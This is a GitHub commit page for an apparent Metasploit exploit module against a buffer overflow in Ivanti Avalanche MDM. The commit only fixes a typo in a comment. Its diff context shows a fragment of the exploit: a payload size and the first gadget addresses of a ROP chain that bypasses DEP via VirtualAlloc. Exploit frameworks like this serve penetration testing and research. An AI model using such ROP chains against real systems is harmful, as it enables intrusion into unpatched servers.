Skip to content

Commit 9044588

Browse files
Update modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb
Co-authored-by: Christophe De La Fuente <[email protected]>
1 parent f96ca44 commit 9044588

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -78,7 +78,7 @@ def check
7878
def exploit
7979
expected_payload_size = 622
8080

81-
# This is a custom ROP chain for byspassing DEP via VirtualAlloc
81+
# This is a custom ROP chain for bypassing DEP via VirtualAlloc
8282
rop_chain = [0x00544498].pack('V') # pop edx ; mov eax, 0x00000022 ; ret ;
8383
rop_chain += [0x00001000].pack('V') # flAllocationType
8484
rop_chain += [0x00499ac0].pack('V') # pop eax ; ret ;

0 commit comments

Comments
 (0)